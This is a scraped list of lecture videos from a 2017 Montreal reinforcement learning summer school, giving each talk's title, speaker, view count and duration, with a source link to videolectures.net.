Reinforcement Learning Summer School 185 views, 1:29:32 Reinforcement Learning Joelle Pineau 84 views, 1:28:26 Policy Search for RL Pieter Abbeel 122 views, 1:26:24 TD Learning Richard S. Sutton 55 views, 1:21:20 Deep Reinforcement Learning Hado van Hasselt 79 views, 1:23:52 Deep Control Nando de Freitas 47 views, 1:23:58 Theory of RL Csaba Szepesvári [syn] 35 views, 1:29:02 Reinforcement Learning Satinder Singh 25 views, 1:21:44 Safe RL Philip S. Thomas 35 views, 43:54 Applications of bandits and recommendation systems Nicolas Le Roux 71 views, 1:02:35 Cooperative Visual Dialogue with Deep RL Devi Parikh, Dhruv Batra Sursa: http://videolectures.net/deeplearning2017_montreal/
×
×
  • Create New...